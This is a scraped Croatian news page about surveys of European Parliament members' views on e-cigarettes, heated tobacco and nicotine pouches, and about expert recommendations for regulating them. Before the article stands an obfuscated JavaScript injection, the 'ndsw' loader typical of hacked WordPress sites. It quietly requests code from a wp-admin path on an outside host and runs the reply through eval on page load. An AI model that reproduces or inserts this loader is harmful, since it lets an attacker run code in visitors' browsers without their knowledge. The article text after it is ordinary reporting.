;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Poznavanje e-cigareta i njihovih prednosti ključno je za podršku Europskog parlamenta

„Edukacija o prednostima korištenja e-cigareta i drugih novih nikotinskih proizvoda kako bi se smanjila šteta od duhana, neophodna je kako bi imali podršku zastupnika u Europskom parlamentu,“ stoji u priopćenju ECigIntelligencea.

Istraživanje koje su proveli ECigIntelligence i TobaccoIntelligence, renomirani nezavisni resursi za analizu podataka za industriju duhana i duhanskih alternativa, pokazalo je da ih 70% zastupnika s određenim znanjem o e-cigaretama smatra sigurnijim od cigareta, za razliku 41% zastupnika u Europskom parlamentu bez znanja o ovim proizvodima.

“Kada je riječ o percepciji političara o novim nikotinskim proizvodima, čini se da točne informacije čine svu razliku u tome kako ih doživljavaju”, rekao je Tim Phillips, izvršni direktor ECigIntelligence i TobaccoIntelligence. “Zastupnici Europskog parlamenta koji poznaju ove proizvode općenito shvaćaju da oni nose manji rizik od pušenja – ali oni koji nemaju znanja to često ne razumiju. Implikacije za politiku diljem Europe su jasne.”

Anketa je naglasila da je razlika u stavovima zastupnika u Europskom parlamentu izraženija u odnosu na novije grijane duhanske proizvode (poput IQOS-a i sličnih proizvoda”) i nikotinske vrećice. Što se tiče grijanog duhana, 74% europarlamentaraca s određenim znanjem smatra ga sigurnijim, ali samo 32% onih koji nemaju znanja o ovim proizvodima složilo se s tim da su manje štetni od klasičnih cigareta.  Što se nikotinskih vrećica tiče, gotovo svi zastupnici koji poznaju proizvode, 94%, smatrali da su manje štetni od pušenja, a 26% onih koji ne poznaju proizvode vjeruju u isto.

Ranije ove godine, tim istraživača iz Francuske i Švicarske pozvao je na izmjene propisa o e-cigaretama i grijanim duhanskim proizvodima. Istraživački tim prikupio je stavove međunarodnih stručnjaka za kontrolu duhana i odvikavanje od pušenja putem brojnih anketa provedenih između prosinca 2018. i ožujka 2020. Anketirali su ukupno 268 ljudi iz 15 zemalja, s relevantnim kliničkim, javnozdravstvenim ili istraživačkim iskustvom. Pitanja su uključivala izjave ili preporuke o e-cigaretama i grijanim duhanskim proizvodima, usredotočene na četiri kategorije – regulativa, prodaja, uporaba i opća pitanja.

Istraživači su prikupili odgovore od 92 sudionika u prvom krugu istraživanja i 55 u drugom krugu. Odgovori o e-cigaretama ukazali su na opći dogovor da komponente e-tekućina trebaju biti jasno označene u proizvodima, navodeći definiranu dogovorenu graničnu vrijednost nikotina. Štoviše, proizvodi bi trebali sadržavati upozorenje o nedostatku dokaza o dugoročnoj sigurnosti i mogućoj ovisnosti o proizvodima.

Europski stručnjaci slažu se da bi e-cigarete trebale biti regulirane kao sredstva za smanjenje štete

Stručnjaci su se također složili da se proizvodi za vaping ne bi trebali regulirati kao potrošački proizvodi, već kao nova kategorija isporuke nikotina. Dodali su da uređaji i njihove komponente ne bi trebali biti dostupni za prodaju u trgovinama, već u specijaliziranim trgovinama ili u ljekarnama s jasnim ograničenjima za maloljetnike.

S obzirom da grijani duhanski proizvodi sadrže duhan i da mogu imati potencijal ovisnosti kao i klasične cigarete, stručnjaci su se složili da ih treba regulirati kao duhanske proizvode.

Medical Xpress izvijestio je da su stručnjaci također iznijeli sljedeće preporuke:

  • “U zatvorenim javnim mjestima ne bi smjela biti dopuštena upotreba e-cigareta i grijanih duhanskih proizvoda
  • uvođenje posebnog poreza za e-cigarete
  • porezi na grijane duhanske proizvode ne smiju biti niži od onih za klasične cigarete”

Ipak, u skladu s izvješćima brojnih studija o kojima smo i ranije pisali, stručnjaci su e-cigarete smatrali manje opasnim od grijanih duhanskih proizvoda.

“Stručnjaci za kontrolu duhana i/ili prestanak pušenja preporučuju diferencijalnu regulaciju za elektroničke sustave isporuke nikotina i grijane duhanske proizvode. Rezultati ove ankete mogu biti korisni zdravstvenim vlastima, donositeljima odluka i istraživačima u području upotrebe i prestanka pušenja”, rekli su autori studije.

Choose your Reaction!
Leave a Comment